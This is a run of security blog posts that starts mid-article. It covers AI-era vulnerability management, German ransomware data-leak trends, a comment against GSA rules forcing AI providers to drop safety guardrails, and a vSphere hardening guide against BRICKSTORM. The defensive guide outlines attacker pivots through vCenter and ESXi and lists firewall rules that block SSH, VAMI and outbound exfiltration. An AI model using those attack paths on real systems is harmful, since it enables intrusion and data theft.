Organizations should use perimeter controls to block unnecessary outbound connections from internal network devices. Any attempt by those devices to communicate externally should be investigated to determine whether it is required for normal operations or signals something more concerning. Proactively, organizations should baseline what outbound connections are normal, in order to alert against anomalies.

Formalize Emergency Remediation SLAs

AI may help accelerate patching, but emergency response still depends on clear human processes.

Organizations should define remediation SLAs based on severity, exposure, and asset criticality, and those expectations should be aligned across security, IT, and business stakeholders. When a vulnerability is being actively exploited in the wild, teams need a pre-approved, low-friction process to apply temporary mitigations, such as restricting public access or isolating affected systems, while permanent fixes are validated. Extremely critical business processes should each have secondary systems that can deliver the same objectives with different underlying technology. By having alternatives and fall backs for these processes, organizations give themselves more options to address emergency remediation while minimizing potential business disruption.

Secure AI Agents and Implement SAIF

As organizations deploy AI agents, they also create a new attack surface that must be protected.

Organizations should adopt frameworks such as Google’s Secure AI Framework (SAIF) to guide the secure deployment of AI models and applications. Tools like Google Cloud Model Armor or similar industry solutions can also serve as a protective layer for large language model environments by screening inputs and outputs for prompt injection, jailbreak attempts, and Google Cloud Sensitive Data Protection can prevent sensitive data leakage. Locking down connections that AI systems can establish such as MCP, with fine grained IAM roles is critical to prevent from insecure plugin use threats. 

Defensive AI systems cannot become another point of compromise, and they should be secured accordingly.

Foundational Vulnerability Management Priorities

Not every organization starts from the same baseline. The priorities above assume a relatively mature security program with established tooling, ownership, and operational capacity. For organizations with limited or inconsistent vulnerability management capabilities, the first step is to build a reliable foundation before pursuing advanced AI-enabled operating models.

The Current Reality of Vulnerability Management

Vulnerability management programs vary widely based on the maturity of an organization’s overall security program. In more mature environments, vulnerability management is highly automated: in-scope vulnerabilities are identified, routed to the appropriate IT, infrastructure, or application owners, and automatically validated once remediation is complete.

In less mature environments, the opposite is often true. Vulnerability management may be inconsistent, narrowly scoped, and focused primarily on the highest-profile zero-days. Tracking may still rely on local spreadsheets, systems may be overlooked, and even trusted service infrastructure assets such as Active Directory domain controllers may remain unpatched.

Such organizations need to immediately modernize and elevate their vulnerability management programs. Most organizations were already unable to remediate every vulnerability across their technology stack, and the rise of AI-enabled threats worsens that reality, increasing the urgency of building programs that are automated, measurable, tracked, and validated.

Achieving that outcome is challenging. It requires coordination across the three foundational pillars of any security program: people, process, and technology. A prioritized and phased approach is outlined as follows.

vulnerability management priorities
Foundation Step #1 — Baseline Current State

Begin with the tools, processes, and coverage already in place. Scan everything currently in scope, identify Critical and High findings, and remediate them according to agreed urgency and service levels. At the same time, establish a process for tracking vulnerabilities that are being actively exploited in the wild, along with the emergency patching actions they may require. This phase should also confirm that system owners have defined maintenance windows and the operational support needed to meet remediation SLAs.

Foundation Step #2 — Expand System Scanning Coverage

Broaden vulnerability scanning across all major operating systems in use, including Windows, macOS, and Linux, for both endpoints and servers. Additionally, expand coverage to include other network attached systems, including the network devices themselves.The objective is to reduce blind spots and ensure vulnerability visibility extends across the environment, rather than covering only isolated segments.

Foundation Step #3 — Confirm Asset Inventory and Ownership

Maintain a simple, accurate inventory of key asset classes, including endpoints, servers, public-facing systems, network infrastructure, and specialized devices such as medical equipment where applicable. Every asset should have a clearly defined owner responsible for remediation coordination, exception handling, and lifecycle accountability.

Foundation Step #4 — Establish Standard Program Reporting

Create a consistent reporting cadence that gives stakeholders a clear view of program health and risk. Reporting should include scanning coverage by asset class, top Critical and High vulnerabilities, public-facing exposure, patch compliance, SLA performance, and documented exceptions or risk acceptances. The goal is to produce reporting that drives decisions, not just dashboards that provide visibility.

Foundation Step #5 — Prioritize Public-Facing and High-Risk Vulnerabilities

Identify the attack surface and prioritize vulnerabilities affecting internet-exposed systems, critical infrastructure, and assets that present the highest likelihood of exploitation or business impact. Remediation should be tracked against defined deadlines, with clear escalation paths when timelines are at risk. Where possible, internet-exposed systems should be engineered for automatic patching.

Foundation Step #6 — Develop a Specialized Process for High-Sensitivity Devices

For device classes that require additional coordination, such as medical devices, industrial control systems, or other operational technology, create a streamlined process for identifying vulnerabilities, coordinating with vendors or support teams, and applying compensating controls when patching is not feasible. These assets often require a different remediation model than standard IT systems.

Foundation Step #7 — Formalize Remediation SLAs and Exception Handling

Define remediation SLAs based on severity, exposure, and asset criticality, and ensure they are understood across security, IT, and business stakeholders. Just as importantly, establish a formal exception process for situations where remediation cannot be completed within the required timeframe. Exceptions should be documented, risk-assessed, approved by the appropriate stakeholders, and reviewed on a recurring basis.

How Google Can Help 

In today’s cybersecurity landscape, we’re not just defending against human attackers, but also against tactics supercharged by AI tools. To counter these machine-speed threats, Google provides a comprehensive, AI-integrated defensive ecosystem:

  • Google Threat Intelligence: To combat the unprecedented volume of AI-generated exploits, Google Threat Intelligence enables a proactive 'assume breach' mentality. By fusing Mandiant’s codified frontline adversarial behaviors with Google’s global visibility of the threat landscape, security teams can move beyond static indicators to hunt for the subtle, non-linear behaviors characteristic of novel attacks. As both security noise and true threats escalate, the platform helps organizations better prioritize security resources based on active threats. By cutting through this growing noise to focus on what is truly important, security teams save time, ultimately empowering them to disrupt the adversary’s lifecycle long before they can reach their objective.

  • Mandiant Security Consulting Services: Mandiant AI Security Consulting Solutions can help organizations design and operationalize this architecture. This includes helping organizations speed the identification and remediation of vulnerabilities through code reviews, mature their secure software development lifecycles (SSDLCs), and modernize the overall vulnerability management programs to handle the anticipated influx of vulnerabilities with greater efficiency and resilience. 

  • Agentic SecOps: Google SecOps provides the foundation for an agentic security operations center. This allows teams to augment workflows with agents, combining dynamic AI with deterministic automation. Users can embed agents like the Triage and Investigation agent directly into workflows to accelerate response times. This agent autonomously investigates alerts, gathers evidence, and provides verdicts with clear explanations. This enables automated decision-making and remediation, freeing analysts to focus on high-priority threats rather than false positives. Orchestrating responses becomes more efficient as friction is reduced. Additionally, customers can build enterprise-ready security agents with remote Model Context Protocol (MCP) server support. 

  • Mandiant Threat Defense (MTD): To augment internal teams, Mandiant Threat Defense leverages frontline intelligence and AI-enabled telemetry to proactively hunt for and disrupt advanced, machine-speed threats.

  • Wiz: Organizations can maintain continuous asset discovery and dynamic posture management, ensuring they can rapidly identify and reduce their attack surface across complex, multi-cloud environments.Wiz uses AI agents, powered by environmental context, to democratize security, prioritize remediation, and proactively reduce the attack surface. Wiz continuously integrates the latest AI models to streamline vulnerability detection and response, and its Model Context Protocol (MCP) server enables security teams to use Wiz’s deep context and risk analysis in agentic workflows. The foundational strategy of Wiz connects cloud, code, and runtime, and employs three key agents:

    • Shift Right (Red Agent): Scans the entire attack surface with an AI-powered attacker, using contextual information (cloud, workload, code analysis) to discover immediately exploitable risks.

    • Shift Left (Green Agent): Helps customers identify root causes (cloud-to-code) and automatically deploy fixes using pre-built Wiz skills, and upcoming integrations with CodeMender to self-heal code bases.

    • Detect and respond (Blue Agent): Automates the investigation of AI-enabled attacks at the speed of AI, allowing SOC teams to rapidly triage suspicious behavior and utilize runtime protection tools to detect exploitation.

  • Google Cloud Model Armor: To secure the AI agents organizations deploy, Google Cloud Model Armor acts as a specialized LLM firewall, proactively screening inputs and outputs to block prompt injections and sensitive data leaks. 

Outlook and Implications

The cybersecurity community has the opportunity to serve as the voice of reason: the best response is proactive, disciplined preparation, not panic. While access to the publicly known, most capable frontier models is currently restricted to responsible actors, the availability of these technologies to a broader audience is inevitable. For defenders, this signals a surge in vulnerability management demands. The traditional window between a vulnerability’s disclosure and its active exploitation in the wild has already largely vanished; the primary concern now is the sheer number of exploits organizations will have to defend against simultaneously. Furthermore, the traditional concept of severity is shifting. In a landscape where AI agents can chain together multiple low-level vulnerabilities, the practical impact difference between a remote code execution (RCE) flaw and a seemingly benign local-only exploit is rapidly disappearing. 

To build on the foundational steps above, organizations can work with Mandiant to plan, prioritize, and implement an AI-enabled cyber defense strategy. AI gives security teams powerful new ways to understand their environments, automate remediation at scale, and strengthen workforce capabilities. By adopting AI-integrated defenses today, organizations can better prepare for the speed, scale, and sophistication of tomorrow’s adversaries.

Acknowledgement

This post wouldn't have been possible without numerous experts across Mandiant and GTIG. We specifically would like to thank Omar ElAhdan, Chris Linklater, Austin Larsen, Jared Semrau, Dan Nutting, John Hultquist, and Kimberly Goody for their contributions to this blog post.

The German Cyber Criminal Überfall: Shifts in Europe's Data Leak Landscape

15 April 2026 at 16:00

Written by: Jamie Collier, Robin Grunewald


Germany has reclaimed its position as a primary focus for cyber extortion in Europe. While data leak site (DLS) posts rose almost 50% globally in 2025, Google Threat Intelligence (GTI) data shows that the surge is hitting German infrastructure harder and faster than its regional neighbors, marking a significant return to the high-pressure levels previously observed in the country during 2022 and 2023.

Cyber Criminals Pivoting Back to Germany

Germany moved to the forefront of European data leak targets in 2025. Following a 2024 period where the UK led in DLS victims, this pivot reflects a resurgence of the intense pressure observed across German infrastructure during 2022 and 2023.

This targeting is not a result of the overall number of companies within Europe, as Germany has fewer active enterprises than France or Italy. Instead, its sustained appeal to extortion groups is driven by its status as an advanced European economy with an increasingly digitized industrial base.

Percentage of data leaks affecting European nations in 2025

Figure 1: Percentage of data leaks affecting European nations in 2025

The speed of this escalation is particularly notable. Following a relative cooling of activity in 2024, Germany saw a 92% growth in leaks in 2025—a growth rate that tripled the European average.

The number of German victims listed in data leak sites grew 92% in 2025 compared to 2024

Figure 2: The number of German victims listed in data leak sites grew 92% in 2025 compared to 2024

While several factors influenced European ransomware trends in 2025, a striking contrast emerged in leak volumes. While shaming-site postings for UK-based organizations cooled, non-English speaking nations (particularly Germany) witnessed a surge. This shift reflects a convergence of several factors. The continued maturation of the cyber criminal ecosystem, including the use of AI to automate high-quality localization, is further eroding the historical protection offered by language barriers. However, this "linguistic pivot" is also supported by a shift in victim profiles. As larger "big game" targets in North America and the UK improve their security posture or utilize cyber insurance to resolve incidents privately, threat actors appear to be pivoting toward the "ripe markets" of the German Mittelstand (discussed in further detail later in this post). 

Google Threat Intelligence Group (GTIG) has also observed multiple cyber criminal groups post advertisements, seeking access to German companies and offering a proportion of any extortion fees obtained from victims. For example, dating back to November 2024, the threat actor known as Sarcoma has targeted businesses across several highly developed nations, including Germany.

A forum post by an actor seeking a partnership to target German victims

Figure 3: A forum post by an actor seeking a partnership to target German victims

While the 2025 data marks a record year for German leak volume, it is important to contextualize these figures with a degree of caution. Relying solely on DLS numbers can be misleading, as threat actors typically only post victims who refuse to initiate or complete extortion negotiations. Public reporting on the decline in ransom payment rates may be partially fueling the steady increase in shaming site posts as a secondary pressure tactic. Consequently, while the surge in Germany remains a critical trend, these metrics should be viewed as one component of a broader, more complex threat landscape.

The Diversifizierung of the Cyber Criminal Ecosystem 

2025 was characterized by significant turbulence in the cyber criminal ecosystem, driven by internal conflicts and aggressive law enforcement actions against dominant "big game" operations like LOCKBIT and ALPHV. The resulting vacuum at the top of the ransomware market has led to a more crowded field of agile, mid-tier DLS brands. In Germany, this rebalancing is highly visible: as established brands receded, a wider pool of competitors emerged to absorb the market share.

German victims on data leak sites rose sharply in 2025

Figure 4: German victims on data leak sites rose sharply in 2025

Following the disruption of LockBit, groups such as SAFEPAY and Qilin have gained significant prominence within the German landscape. SAFEPAY, in particular, claimed breaches of 76 German companies in 2025—accounting for 25% of all German victim posts that year. Meanwhile, Qilin tripled its operational tempo in Germany during Q3 2025. While this increase aligns with Qilin's broader global uptick in activity, their consistent focus on German targets (including 13 victims posted already in early 2026) demonstrates that their presence in the German landscape grows in lockstep with their global expansion.

Leaked data of a German company (name redacted) by SafePay

Figure 5: Leaked data of a German company (name redacted) by SafePay

No Such Thing as Too Small: Targeting of the Mittelstand 

There is a persistent myth that small businesses are "too small" to be targeted, a perception often fueled by the fact that large global corporations often dominate cyber crime headlines. However, the 2025 data tells a different story: organizations with fewer than 5,000 employees accounted for 96% of all ransomware leaks in Germany. While this figure largely aligns with the structural composition of the German economy, it underscores a concerning disconnect between public perception and actual targeting patterns. While "big game" hits make the news, the high volume of leaks among medium- and small-sized victims proves they are highly attractive targets for cyber criminals—often because they lack the extensive security personnel and specialized resources of their larger counterparts.

The targeting of the Mittelstand creates a significant secondary risk for large German enterprises and multinationals. While a major corporation may have robust defenses, its broader ecosystem of suppliers and contractors often manages sensitive data or maintains privileged network access. To address these systemic gaps, large enterprises must evolve from passive monitoring to a proactive third-party risk management framework, implementing vendor tiering and enforcing multifactor authentication to neutralize the lateral movement favored by modern cyber criminals.

Size of victim organizations found on data leak sites

Figure 6: Size of victim organizations found on data leak sites

Targeting Beyond the Assembly Line

Germany's industrial base remains the primary focus for cyber criminals with manufacturing accounting for 23% of all dark web leaks in 2025. However, the German cyber criminal landscape is characterized by its variety, with legal & professional services (14%), construction & engineering (11%), and retail (10%) all targeted.

The most notable shift in the 2025 data is the growth within the legal & professional services sector. This increase is likely intentional: these firms represent high-value targets because they serve as trusted custodians of sensitive client data, including intellectual property, financial strategies, and M&A plans. This allows cyber criminals to extract significant extortion payments beyond their primary victim and gain downstream leverage over an entire client base.

Data leak victims in Germany by industry

Figure 7: Data leak victims in Germany by industry

Outlook  

The data from 2025 reveals that the recent surge in German leaks is not an isolated incident, but a return to the high-pressure levels previously observed in 2022 and 2023. This resurgence reflects a more volatile and linguistically diverse European threat landscape going into 2026. The 92% growth in German leaks, tripling the European average for 2025, proves that non-English-speaking nations remain a primary target for global extortion groups. 

The disruption of established brands like LockBit has rebalanced the ecosystem into a crowded field of agile data leak sites, such as SafePay and Qilin. These groups appear to be hitting Germany in lockstep with their global expansion, identifying the Mittelstand and German professional services as high-volume, target-rich environments. As threat actors continue to exploit complex supply chains, smaller organizations will remain critical pivot points for those aiming at the top of the industrial stack.

Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment.

Tech Nonprofits to Feds: Don’t Weaponize Procurement to Undermine AI Trust and Safety

3 April 2026 at 19:37

While the very public fight continues between the Department of Defense and Anthropic over whether the government can punish a company for refusing to allow its technology to be used for mass surveillance, another agency of the U.S. government is quietly working to ensure that this dispute will never happen again. How? By rewriting government procurement rules.

Using procurement — meaning, the processes by which governments acquire goods and services  to accomplish policy goals is a time-honored and often appropriate strategy. The government literally expresses its politics and priorities by deciding where and how it spends its money. To that end, governments can and should give our tax dollars to companies and projects that serve the public interest, such as open-source software development, interoperability, or right to repair. And they should withhold those dollars from those that don’t, like shady contractors with inadequate security systems.

New proposed rules for the principal agency in charge of acquiring goods, property, and services for the federal government, the General Services Administration (GSA), are supposed to be primarily an effort to implement one policy priority: promoting “ideologically neutral” American AI innovation. But the new guidelines do far more than that.

As explained in comments filed today with our partners at the Center for Democracy and Technology, the Protect Democracy Project, and the Electronic Privacy Information Center, the GSA’s guidelines include broad provisions that would make AI tools less safe and less useful. If finally adopted, these provisions would become standard components of every federal contract. You can read the full comments here.

The most egregious example is a requirement that contractors and government service providers must license their AI systems to the government for “all lawful purposes.” Given the government’s loose interpretations of the law, ability to find loopholes to surveil you, and willingness to do illegal spying, we need serious and proactive legal restrictions to prevent it from gobbling up all the personal data it can acquire and using even routine bureaucratic data for punitive ends.

Relatedly, the draft rules require that “AI System(s) must not refuse to produce data outputs or conduct analyses based on the Contractor’s or Service Provider’s discretionary policies.” In other words, if a company’s safety guardrails might prevent responding to a government request, the company must disable those guardrails. Given widespread public concerns about AI safety, it seems misguided, at best, to limit the safeguards a company deems necessary.

There are myriad other problems with the draft rules, such as technologically incoherent “anti-Woke” requirements. But, the overarching problem is clear: much of this proposal would not serve the overall public interest in using American tax dollars to promote privacy, safety, and responsible technological innovation. The GSA should start over.

vSphere and BRICKSTORM Malware: A Defender's Guide

2 April 2026 at 16:00

Written by: Stuart Carrera


Introduction 

Building on recent BRICKSTORM research from Google Threat Intelligence Group (GTIG), this post explores the evolving threats facing virtualized environments. These operations directly target the VMware vSphere ecosystem, specifically the vCenter Server Appliance (VCSA) and ESXi hypervisors. To help organizations stay ahead of these risks, we will focus on the essential hardening strategies and mitigating controls necessary to secure these critical assets.

By establishing persistence at the virtualization layer, threat actors operate beneath the guest operating system where traditional security protections are ineffective. This strategy takes advantage of a significant visibility gap, as these control planes do not support standard endpoint detection and response (EDR) agents and have historically received less security focus than traditional endpoints.

This activity is not the result of a security vulnerability in vendors' products or infrastructure. Instead, these intrusions rely on the effectiveness of exploiting weak security architecture and identity design, a lack of host-based configuration enforcement, and limited visibility within the virtualization layer. By operating within these unmonitored areas, attackers can establish long-term persistence and gain administrative control over the entire vSphere environment.

BRICKSTORM vSphere attack chain

Figure 1: BRICKSTORM vSphere attack chain

This guide provides a framework for an infrastructure-centric defense. To help automate some of this guidance and secure the control plane against threats like BRICKSTORM, Mandiant released a vCenter Hardening Script that enforces these security configurations directly at the Photon Linux layer. By implementing these recommendations, organizations can transform the virtualization layer into a hardened environment capable of detecting and blocking persistent threats.

vCenter Server Appliance Risk Analysis

The vCenter Server Appliance (VCSA) is the central point of control and trust for the vSphere infrastructure. Running on a specialized Photon Linux operating system, the VCSA typically hosts critical Tier-0 workloads, such as domain controllers and privileged access management (PAM) solutions. This means the underlying virtualization platform inherits the same classification and risk profile as the highly sensitive assets it supports.

A compromise of the vCenter control plane grants an attacker administrative control over every managed ESXi host and virtual machine, effectively rendering traditional organizational tiering irrelevant. Because the VCSA is a purpose-built appliance, relying on out-of-the-box defaults is often insufficient; achieving a Tier-0 security standard requires intentional, custom security configurations at both the vSphere and the underlying Photon Linux layers. 

For a threat actor, the VCSA provides:

  • Centralized Command: This provides the ability to power off, delete, or reconfigure any virtual machine combined with the ability to reset root credentials on any managed ESXi host providing full control of the hypervisor.

  • Total Data Access: Access to the underlying storage (VMDKs) of every application, bypassing operating system permissions and traditional file system security. This provides a direct path for data exfiltration of Tier-0 assets.

  • Command-Line Logging Gaps: If an attacker gains access to the underlying Photon OS shell via Secure Shell (SSH), there is no remote logging of the shell commands.

Management Plane Dependencies

Many organizations host their Active Directory domain controllers as virtual machines (VMs) within the same vSphere cluster managed by a vCenter that is itself AD-integrated. If an attacker disables the virtual network or encrypts the datastores, vCenter loses its ability to authenticate administrators. In a scenario where the VCSA is encrypted or wiped, the tools required for large-scale recovery are also lost. This forces organizations to rely on manual restores via individual ESXi hosts, extending the recovery timeline exponentially.

vSphere 7 End of Life

vSphere 7 reached End of Life (EoL) in October 2025. Organizations with this legacy technical debt will have vSphere software entering a window (until upgrade) where they will no longer receive critical security patches. This provides an opportunity for threat actors to exploit known vulnerabilities that will not be fixed.

The Strategic Advantage of Proactive Measures

To secure the control plane, organizations should adopt a strategy where the infrastructure itself acts as the primary line of defense. 

A resilient defense relies on two strategies:

  • Technical Hardening: Defense-in-depth should be applied to the hypervisor layer to reduce the attack surface. Threat actors target insecure defaults. Hardening measures, such as enabling Secure Boot, strictly firewalling management interfaces, and disabling shell access, create “friction.” When a threat actor attempts to write a persistence script to /etc/rc.local.d or modify a startup file, a hardened configuration can block the action or force the actor to use methods that generate excessive log telemetry.
  • High-Fidelity Signal Analysis: Threat actors are adept at rotating infrastructure and recompiling tools to change their signatures. Relying on a blocklist of bad IPs or a database of known malware hashes is not an effective strategy as threat actors utilize command-and-control servers and native binaries. Instead, the focus should shift entirely to behavioral patterns.

Building on this strategic foundation where the infrastructure itself acts as the primary line of defense, this guide outlines four phases of technical enforcement:

  • Phase 1: Benchmarking and Base Controls – Establishing the foundation with Security Technical Implementation Guides (STIG) and patching.

  • Phase 2: Identity Management – Hardening administrative access to critical infrastructure via PAWs and PAM solutions. 

  • Phase 3: vSphere Network Hardening – Eliminating lateral movement with Zero Trust networking. 

  • Phase 4: Logging and Forensic Visibility – Transforming the appliance into a proactive security sensor.

Phase 1: Benchmarking and Base Controls

Organizations should use the hardening measures outlined in the Mandiant vSphere hardening blog post combined with a strict patching and upgrade strategy. This provides a standard foundation to develop a strong security posture. By implementing an enhanced security baseline centered on the Photon Linux DISA STIG and VMware security hardening guides, organizations can harden the OS-level components that actors target.

Key Frameworks:

STIG Control Mappings to Attacker TTPs

STIG ID

Control Title

TTP 

Detail 

V-258910

Require Multi-factor authentication (MFA)

Establish Foothold / Privilege Escalation

MFA on vCenter web login prevents compromised Active Directory credentials from granting full access.

V-256337

Real-time Alert on SSO Account Actions

Persistence / Anti-Forensics

Creates local accounts, deploys backdoors, and deletes the accounts within minutes. Real-time alerting on PrincipalManagement events is required to catch this activity.

V-258921

Verify User Roles (Least Privilege)

Data Exfiltration

Identifies and removes excessive permissions from standard user roles that are aggregated into non-admin roles.

V-258956

Limit membership to "BashShellAdministrators"

Escalate Privileges

Even if an attacker compromises a vSphere Admin account, they cannot access the Photon OS bash shell unless that account is in this specific single sign-on (SSO) group. It blocks the "VAMI-to-Shell" pivot used to deploy backdoors.

V-258968

Disable SSH Enablement 

Initial Access

Actors often use the VAMI (Port 5480) to enable SSH before deploying the backdoor. This control ensures that SSH is "Disabled."

STIG controls mapping

vSphere Infrastructure-Level Data Exfiltration

Standard vSphere configurations typically mask high-risk permissions such as VM cloning and exporting within generalized administrative roles, allowing these actions to blend into the background noise of routine operations. This architecture provides a threat actor with the means to execute a silent exfiltration of a domain controller or credential repository. Organizations should transition from a model of permissive vSphere access control to a comprehensive cryptographic enforcement policy.

Security Control

What It Protects Against

Implementation Method

vSphere VM Encryption

Theft of VMDK files from the datastore; offline analysis and snapshot of memory

Enable in VM Policies (Requires a KMS)

In-Guest Encryption (BitLocker)

Mounting the VMDK to another VM; offline file system browsing

Enable inside Windows OS (Requires a vTPM)

vMotion Encryption

Capture of in-memory credentials (krbtgt hashes) during live migration

Set vMotion to "Required" in VM Options

Virtual TPM (vTPM) & Secure Boot

Bootkit persistence and tampering; strengthens in-guest features like Credential Guard

Enable in VM Options (Hardware & Boot sections)

Lock Boot Order & BIOS

Booting from a malicious ISO to reset passwords or bypass security controls

Set a VM BIOS password and configure boot options

Disable Copy/Paste

Silent data exfiltration of credentials or secrets via the VM console

Set VM Advanced Settings (isolation.tools.* = true)

Recommended controls for data exfiltration mitigation

Resilience against vSphere data exfiltration requires a shift in how high-value virtual assets are governed:

  • Mandatory Tier-0 Encryption: The enforcement of vSphere-native VM encryption is the primary and most essential control for all critical Tier-0 virtual machines. Organizations should mandate that every domain controller, certificate authority, and password vault be encrypted at the virtual machine level. 

  • Cryptographic Isolation: Tier-0 assets should be subject to a unique key-locked encryption policy. By mandating a separate key management server (KMS) cluster for these workloads, organizations ensure that a threat actor cannot unlock a cloned disk without access to a secure, hardware-backed vault.

  • Entitlement De-coupling: The "Clone" and "Export" privileges should be stripped from standard administrative roles. These functions should be reassigned to a highly restricted, auditable "break-glass" identity, used exclusively for emergency recovery scenarios.

Phase 2: Identity Management 

Best practices for Identity management in vSphere focuses on mandating all vSphere administrative sessions originate from dedicated privileged access workstations and utilize a PAM while also enforcing host-level hardening through the restriction of the vpxuser shell access.

Privileged Access Workstations (PAWs)

To prevent a threat actor from pivoting to the virtualization management plane from compromised user endpoints or appliances, administrative sessions should originate from a dedicated PAW. This is a dedicated hardened workstation only utilized when interfacing with vSphere administrative functions or interfaces.

Privileged Access Management (PAM)

PAM tools serve as an intermediary to mitigate specific threats such as the BRICKSTEAL credential harvester. By mandating credential injection, organizations ensure that passwords are never typed or exposed in memory on the target system where malware could intercept them. Automated secret rotation should be enforced to limit the lifespan of any compromised credentials, particularly for root passwords and service account keys. 

Authentication and Platform Hardening

Accounts residing in the default vsphere.local single sign-on (SSO) domain, most notably the built-in administrator@vsphere.local superuser, pose a specific security risk because they do not support modern MFA integration. Due to this limitation, organizations should limit the use of vsphere.local accounts for daily administration; instead, they should be treated as emergency "break-glass" credentials that are secured with complex, vaulted passwords. 

The vSphere VPXUSER

The vpxuser is a high-privilege system account provisioned by vCenter on each managed host to facilitate core infrastructure management operations.

A threat actor possessing administrative control over the VCSA effectively inherits the delegated authority of the vpxuser across the entire managed cluster. This entitlement enables a pivot from the management plane to the host-level shell.

The Primary Mitigation (vSphere ESXi 8.0+): Disabling Shell Access

To mitigate this lateral movement vector, vSphere 8.0 introduced a technical control allowing administrators to remove shell access from the vpxuser account. Enforce the following configuration on all ESXi 8.0+ hosts to restrict the vpxuser identity:

esxcli system account set -i vpxuser -s false

ESXi Host Identity Hardening Strategy

Additional hardening measures to prevent bypasses via alternative mechanisms, such as Host Profile manipulation, include:

Control Type

Strategic Requirement

Implementation Method

Pivot Mitigation

VPXUSER Shell Lock

Disable shell access for the management account to sever the vCenter-to-Host attack path.

Account Obfuscation

Rename root Account

Transition the default root identifier to a unique, non-predictable string to invalidate automated brute-force attempts.

Credential Entropy

15+ Character Baseline

Enforce a strict, system-wide password complexity policy using Security.PasswordQualityControl.

Vaulted Identity

Secure Credentials 

Mandate the use of an enterprise password vault for all local host credentials to ensure auditable "break-glass" access.

ESXi host hardening

Phase 3: vSphere Network Hardening

Securing the Virtualization Network

Establishing a vSphere Zero Trust network posture is the foundational requirement for securing a resilient Tier-0 architecture. Because the vCenter Server Appliance (VCSA) and ESXi hypervisors lack native MFA support for local privileged accounts, identity-based validation is insufficient as a singular point of security enforcement. Once a threat actor harvests these credentials, the logical network architecture remains the only defensive layer capable of preventing the threat actor's access to the vSphere management plane.

A strictly segmented architecture integrating physical network isolation with host-based micro-segmentation serves as the definitive safeguard; by systematically eliminating all logical network paths from untrusted zones to the management zone, the underlying attack vector is neutralized, ensuring that a BRICKSTORM intrusion remains physically and logically incapable of compromising the vCenter control plane.

The architectural blueprint shown in Figure 2 is designed to eliminate these common internal attack vectors.

vSphere Zero Trust networking and detection

Figure 2: vSphere Zero Trust networking and detection

1. Immutable Virtual Local Area Network (VLAN) Segmentation

Organizations should enforce isolation through distinct 802.1Q VLAN IDs. Threat actors will exploit "flat" or poorly partitioned networks where a compromise in a low-security/low-trust zone (such as a demilitarized zone [DMZ] or edge appliance) can route directly to the Management VAMI (Port 5480) or shell access to the VCSA (Port 22) high-trust network segments.

VLAN

Description

Members

Strategic Security Policy

Host Management

ESXi Hypervisor Control Plane

ESXi vmk0 Management Interfaces

Restricted Access. Exclusively accepts traffic from the VCSA and authorized PAWs.

VCSA / Infrastructure

Cluster Management Applications

vCenter (VCSA), Backup Servers, NSX Managers

Tier-0 Restricted Zone. Should be logically and physically unreachable from all Guest VM segments.

vMotion

Live Memory Migration

ESXi vmk1 (vMotion Stack)

Non-Routable. Prevents interception of unencrypted RAM data during migration.

Storage

vSAN / iSCSI / NFS

ESXi vmk2 (Storage Stack)

Non-Routable. Critical for block-level data integrity; prevents out-of-band disk manipulation.

Virtual Machine

Production Workloads

Virtual Machine Port Groups

Untrusted Zone. Entirely isolated from all infrastructure management VLANs.

Layer 2 segmentation

2. Routing as a Security Barrier

The objective is to transform the Management Network into a secured zone. A threat actor residing on a standard corporate subnet or Wi-Fi network should be physically unable to communicate with the VCSA.

A. Virtual Routing and Forwarding (VRF) Segmentation
  • Action: Transition all Infrastructure VLANs into a dedicated VRF instance on the core routing layer.

  • Strategic Impact: This creates a defined routing table. Even in the event of a total compromise in the "User" or "Guest" VRF, the network hardware will have no route to the "Management" VRF, preventing lateral movement even if physical adjacency exists.

B. Privileged Admin Workstation (PAW Exclusive Access)
  • Action: Deconstruct all direct routes from the general corporate LAN to the Management Subnet(s).

  • Strategic Impact: Access to the Management Subnet should originate from a designated PAW IP range / subnet. All other internal subnets including standard user workstations, and guest VMs should have no route or be subject to an explicit Deny policy at the gateway. This forces the threat actor to attempt a compromise of the PAW, a significantly more hardened and monitored target, before they can connect to the VCSA.

3. Hardened Perimeter Ingress and Egress Filtering

These rules should be enforced at the hardware firewall or Layer 3 Core acting as the gateway for the Management Subnet. Because the VCSA's GUI-based native firewall is architecturally incapable of enforcing egress (outbound) policy, the upstream network gateway should enforce this policy. Organizations should implement a restrictive egress policy to ensure that if a VCSA is compromised, it cannot connect to malicious command-and-control infrastructure or exfiltrate Tier-0 data.

A. Ingress Filtering (Incoming to Management)

Source

Destination

Protocol / Port

Policy

Mitigation

PAW

Mgmt VLAN

TCP / 443

ALLOW

Authorized vSphere Client/API Access

PAW

ESXi VLAN

TCP / 902

ALLOW

Secure Remote Console (MKS) Access

ESXi

VCSA IP

TCP / 443 

ALLOW

ESXi Host to vCenter communication

Backup 

VCSA IP

TCP / 443

ALLOW

Backup API Access 

Monitoring

Mgmt VLAN

ICMP Ping

UDP / 161 (SNMP)

ALLOW

Verified Infrastructure Health Probes

ANY

Mgmt VLAN

TCP / 22

DENY

MANDATORY SSH BLOCK. Enforce shell access via PAW only.

ANY

Mgmt VLAN

TCP / 5480

DENY

MANDATORY VAMI BLOCK. Prevents unauthorized management enablement.

Guest VM

Mgmt VLAN

ANY

DENY

Eliminates all East-West lateral movement paths

Ingress filtering
B. Egress Filtering (Outbound from VCSA/Management)

Source

Destination

Protocol / Port

Policy

Mitigation

VCSA

Internal DNS

UDP/TCP 53

ALLOW

Restrict DNS to trusted internal resolvers only.

VCSA

Remote Syslog

TCP / 6514

ALLOW

TLS Encrypted Telemetry. Required for SIEM visibility

VCSA

Public IP for VMware Update Manager

TCP / 443

ALLOW

Strictly limit to "162.159.140.167" and "172.66.0.165" (VMware Update servers).

VCSA

Identity Provider

TCP / 443

ALLOW

Required for Federated Authentication (Okta/Entra)

VCSA

Internal Subnets

ANY

DENY

Block Internal Scanning. Prevents VCSA-to-Internal pivots.

VCSA

Internet (ANY)

ANY

DENY

Suppresses C2. Blocks DoH, SOCKS proxies, and data exfiltration.

Egress filtering

Note on Micro-Segmentation: While physical firewalls secure the management plane (North-South), VMware NSX Distributed Firewall (DFW) is the required standard for controlling guest-to-guest (East-West) traffic. Where applicable, NSX should be used to protect the data plane, while physical network hardware remains the control of the management plane.

Host-Based Firewalls for VCSA and ESXi

